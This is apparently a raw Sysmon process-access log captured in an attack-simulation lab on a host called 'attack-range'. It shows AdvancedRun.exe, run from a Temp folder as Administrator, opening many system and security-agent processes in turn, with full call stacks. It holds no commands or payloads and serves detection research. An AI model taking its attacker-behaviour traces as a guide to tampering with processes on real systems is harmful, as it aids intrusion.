20:08:57.659{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067467Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.659{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.659{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067465Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.658{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.657{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.657{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067462Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.657{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.657{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004067458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.656{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.655{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 